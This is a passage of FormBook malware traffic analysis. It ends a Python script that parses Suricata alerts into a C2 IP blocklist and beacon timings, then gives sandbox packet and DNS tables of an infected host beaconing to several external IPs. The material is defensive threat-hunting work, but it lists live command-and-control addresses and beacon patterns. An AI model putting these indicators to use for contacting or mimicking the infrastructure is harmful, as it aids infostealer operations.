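    """Distinct C2 IPs, sorted, ready for a firewall or IP blocklist."""
    return sorted({ip for (ip, _, _) in summary})


def beacon_gaps(alerts):
    """Seconds between consecutive check-ins in time order. In the report each
    check-in goes to a different host, so cadence must be measured across hosts,
    not per destination, when hunting for this beacon in other telemetry."""
    times = sorted(parse_ts(a["timestamp"]) for a in alerts)
    return [round((b - a).total_seconds(), 1) for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    hits = formbook_alerts(parse_eve(SAMPLE_EVE))
    summary = c2_summary(hits)
    for (ip, port, proto), e in sorted(summary.items()):
        print(f"{ip}:{port}/{proto} hits={e['hits']} "
              f"first={e['first_seen'].isoformat()} ports={e['client_ports']}")
    print("blocklist:", c2_blocklist(summary))
    print("gaps (s):", beacon_gaps(hits))
```

Each alert timestamp in the report coincides with a client-to-server packet in the TCP list (for example 17:43:39.116071939 on port 49782), which is why the summary treats src_ip as the victim; a rule that matched the server's response direction would need the key swapped. Replace SAMPLE_EVE with the contents of a real eve.json to run this against live data.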
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 17:43:37.481515884 CET | 49782 | 80 | 192.168.2.9 | 154.215.72.110
Dec 6, 2024 17:43:37.601391077 CET | 80 | 49782 | 154.215.72.110 | 192.168.2.9
Dec 6, 2024 17:43:37.603389978 CET | 49782 | 80 | 192.168.2.9 | 154.215.72.110
Dec 6, 2024 17:43:37.605808973 CET | 49782 | 80 | 192.168.2.9 | 154.215.72.110
Dec 6, 2024 17:43:37.725711107 CET | 80 | 49782 | 154.215.72.110 | 192.168.2.9
Dec 6, 2024 17:43:39.115890980 CET | 80 | 49782 | 154.215.72.110 | 192.168.2.9
Dec 6, 2024 17:43:39.115932941 CET | 80 | 49782 | 154.215.72.110 | 192.168.2.9
Dec 6, 2024 17:43:39.116071939 CET | 49782 | 80 | 192.168.2.9 | 154.215.72.110
Dec 6, 2024 17:43:39.119153023 CET | 49782 | 80 | 192.168.2.9 | 154.215.72.110
Dec 6, 2024 17:43:39.239156961 CET | 80 | 49782 | 154.215.72.110 | 192.168.2.9
Dec 6, 2024 17:44:03.445017099 CET | 49844 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:03.564943075 CET | 80 | 49844 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:03.565049887 CET | 49844 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:03.566926003 CET | 49844 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:03.687235117 CET | 80 | 49844 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:05.082843065 CET | 49844 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:05.090445995 CET | 80 | 49844 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:05.090570927 CET | 49844 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:05.090753078 CET | 80 | 49844 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:05.090817928 CET | 49844 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:05.202996016 CET | 80 | 49844 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:05.203485012 CET | 49844 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:06.101829052 CET | 49850 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:06.223057985 CET | 80 | 49850 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:06.223157883 CET | 49850 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:06.225018024 CET | 49850 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:06.345778942 CET | 80 | 49850 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:07.739015102 CET | 49850 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:07.748866081 CET | 80 | 49850 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:07.748970985 CET | 49850 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:07.749399900 CET | 80 | 49850 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:07.749473095 CET | 49850 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:07.858964920 CET | 80 | 49850 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:07.859169006 CET | 49850 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:08.757430077 CET | 49856 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:08.877233982 CET | 80 | 49856 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:08.877599955 CET | 49856 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:08.879355907 CET | 49856 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:08.999406099 CET | 80 | 49856 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:08.999439001 CET | 80 | 49856 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:10.395468950 CET | 49856 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:10.415050983 CET | 80 | 49856 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:10.415278912 CET | 49856 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:10.418417931 CET | 80 | 49856 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:10.418487072 CET | 49856 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:10.518749952 CET | 80 | 49856 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:10.518807888 CET | 49856 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:11.413800955 CET | 49865 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:11.533952951 CET | 80 | 49865 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:11.534342051 CET | 49865 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:11.536209106 CET | 49865 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:11.656635046 CET | 80 | 49865 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:13.060348034 CET | 80 | 49865 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:13.060626984 CET | 80 | 49865 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:13.060877085 CET | 49865 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:13.063066959 CET | 49865 | 80 | 192.168.2.9 | 116.50.37.244
Dec 6, 2024 17:44:13.182823896 CET | 80 | 49865 | 116.50.37.244 | 192.168.2.9
Dec 6, 2024 17:44:26.845880032 CET | 49901 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:26.965900898 CET | 80 | 49901 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:26.965985060 CET | 49901 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:26.968638897 CET | 49901 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:27.088593960 CET | 80 | 49901 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:28.473623037 CET | 49901 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:28.644140005 CET | 80 | 49901 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:28.644246101 CET | 49901 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:29.493033886 CET | 49908 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:29.616705894 CET | 80 | 49908 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:29.616991997 CET | 49908 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:29.619647026 CET | 49908 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:29.739646912 CET | 80 | 49908 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:31.129875898 CET | 49908 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:31.252083063 CET | 80 | 49908 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:31.252162933 CET | 49908 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:32.155410051 CET | 49915 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:32.275402069 CET | 80 | 49915 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:32.275495052 CET | 49915 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:32.277421951 CET | 49915 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:32.398169994 CET | 80 | 49915 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:32.399266958 CET | 80 | 49915 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:33.786012888 CET | 49915 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:33.906342030 CET | 80 | 49915 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:33.906400919 CET | 49915 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:34.804649115 CET | 49921 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:34.924614906 CET | 80 | 49921 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:44:34.927566051 CET | 49921 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:34.931458950 CET | 49921 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:44:35.051836014 CET | 80 | 49921 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:45:36.259124994 CET | 80 | 49921 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:45:36.259242058 CET | 80 | 49921 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:45:36.259355068 CET | 49921 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:45:36.262116909 CET | 49921 | 80 | 192.168.2.9 | 85.159.66.93
Dec 6, 2024 17:45:36.382164001 CET | 80 | 49921 | 85.159.66.93 | 192.168.2.9
Dec 6, 2024 17:45:41.643601894 CET | 49983 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:41.763391972 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:41.763485909 CET | 49983 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:41.765894890 CET | 49983 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:41.885740995 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:43.060255051 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:43.060302019 CET | 80 | 49983 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:43.060463905 CET | 49983 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:43.306164980 CET | 49983 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:44.320291996 CET | 49984 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:44.440478086 CET | 80 | 49984 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:44.440639973 CET | 49984 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:44.442523003 CET | 49984 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:44.562493086 CET | 80 | 49984 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:45.722722054 CET | 80 | 49984 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:45.722784996 CET | 80 | 49984 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:45.722939014 CET | 49984 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:45.958084106 CET | 49984 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:46.978069067 CET | 49985 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:47.098726988 CET | 80 | 49985 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:47.098872900 CET | 49985 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:47.101723909 CET | 49985 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:47.221987009 CET | 80 | 49985 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:47.222244978 CET | 80 | 49985 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:48.379008055 CET | 80 | 49985 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:48.474560976 CET | 80 | 49985 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:48.474627018 CET | 49985 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:48.614408970 CET | 49985 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:49.632991076 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:49.754121065 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:49.754219055 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:49.756489992 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:49.876722097 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066564083 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066622972 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066634893 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066775084 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066795111 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066809893 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066807985 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:51.066822052 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066833973 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066864014 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:51.066922903 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:51.066951990 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.066994905 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.067667961 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:51.186558962 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.186752081 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.187022924 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:51.190866947 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.239619970 CET | 49986 | 80 | 192.168.2.9 | 91.195.240.94
Dec 6, 2024 17:45:51.259151936 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
Dec 6, 2024 17:45:51.259641886 CET | 80 | 49986 | 91.195.240.94 | 192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.263556004 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.263663054 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.263696909 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.263782024 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.271640062 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.271758080 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.271859884 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.280194998 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.280216932 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:45:51.280339003 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.282816887 CET4998680192.168.2.991.195.240.94
                                                                                      Dec 6, 2024 17:45:51.404274940 CET804998691.195.240.94192.168.2.9
                                                                                      Dec 6, 2024 17:46:05.289267063 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:05.410778999 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:05.411163092 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:05.415682077 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:05.535458088 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:06.655134916 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:06.655426025 CET804998766.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:06.655498981 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:06.929729939 CET4998780192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:07.946571112 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:08.067594051 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:08.067689896 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:08.070110083 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:08.191962957 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:09.324565887 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:09.324588060 CET804998866.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:09.331669092 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:09.583143950 CET4998880192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.602272987 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.722110987 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:10.722291946 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.727907896 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:10.847908974 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:10.847935915 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:11.955743074 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:11.955760956 CET804998966.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:11.955816031 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:12.243163109 CET4998980192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.257879972 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.377767086 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:13.377885103 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.379751921 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:13.499773979 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:14.624983072 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:14.625142097 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:14.625193119 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:14.628947020 CET4999080192.168.2.966.29.149.46
                                                                                      Dec 6, 2024 17:46:14.748759985 CET804999066.29.149.46192.168.2.9
                                                                                      Dec 6, 2024 17:46:20.624509096 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:20.744352102 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:20.744446993 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:20.746615887 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:20.867253065 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:22.053769112 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:22.053940058 CET8049991195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:22.053992033 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:22.255100012 CET4999180192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.274930954 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.395298004 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:23.395504951 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.397727013 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:23.520788908 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:24.732732058 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:24.732815981 CET8049992195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:24.732882023 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:24.911309004 CET4999280192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:25.959275007 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:26.079421043 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:26.079508066 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:26.113141060 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:26.233969927 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:26.233987093 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:27.414124966 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:27.414145947 CET8049993195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:27.414247990 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:27.630332947 CET4999380192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.648845911 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.768996000 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:28.769172907 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.801249981 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:28.921053886 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:30.078202963 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:30.078358889 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:30.078407049 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:30.081250906 CET4999480192.168.2.9195.110.124.133
                                                                                      Dec 6, 2024 17:46:30.201600075 CET8049994195.110.124.133192.168.2.9
                                                                                      Dec 6, 2024 17:46:52.229465961 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:52.349587917 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:52.349673986 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:52.352096081 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:52.472424030 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:53.552764893 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:53.553792953 CET8049995217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:53.553951979 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:53.864525080 CET4999580192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:54.883747101 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:55.003698111 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:55.006089926 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:55.010230064 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:55.130856991 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:56.209917068 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:56.210196972 CET8049996217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:56.210278034 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:56.527884007 CET4999680192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.539242983 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.659693003 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:57.661837101 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.665819883 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:57.786062956 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:57.786082983 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:58.878333092 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:58.878717899 CET8049997217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:46:58.878865004 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:46:59.182018042 CET4999780192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.195631027 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.315506935 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:00.315593004 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.317390919 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:00.437170982 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:01.524945974 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:01.525216103 CET8049998217.196.55.202192.168.2.9
                                                                                      Dec 6, 2024 17:47:01.525321960 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:01.527503967 CET4999880192.168.2.9217.196.55.202
                                                                                      Dec 6, 2024 17:47:01.647414923 CET8049998217.196.55.202192.168.2.9
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 6, 2024 17:43:36.707715034 CET6468053192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:43:37.474148989 CET53646801.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:43:54.166193962 CET5228553192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:43:54.573400021 CET53522851.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:44:02.664020061 CET5296953192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:44:03.442640066 CET53529691.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:44:18.070883989 CET5272753192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:44:18.304300070 CET53527271.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:44:26.367794037 CET5067253192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:44:26.843280077 CET53506721.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:45:41.275595903 CET5699053192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:45:41.638171911 CET53569901.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:45:56.289419889 CET5402153192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:45:56.527445078 CET53540211.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:04.602319956 CET5647353192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:05.286708117 CET53564731.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:19.639329910 CET5701353192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:20.621354103 CET53570131.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:35.087032080 CET5516553192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:35.371536016 CET53551651.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:43.431718111 CET6254453192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:43.660933971 CET53625441.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:46:51.727884054 CET5438053192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:46:52.226324081 CET53543801.1.1.1192.168.2.9
                                                                                      Dec 6, 2024 17:47:06.540668011 CET5561253192.168.2.91.1.1.1
                                                                                      Dec 6, 2024 17:47:06.772746086 CET53556121.1.1.1192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
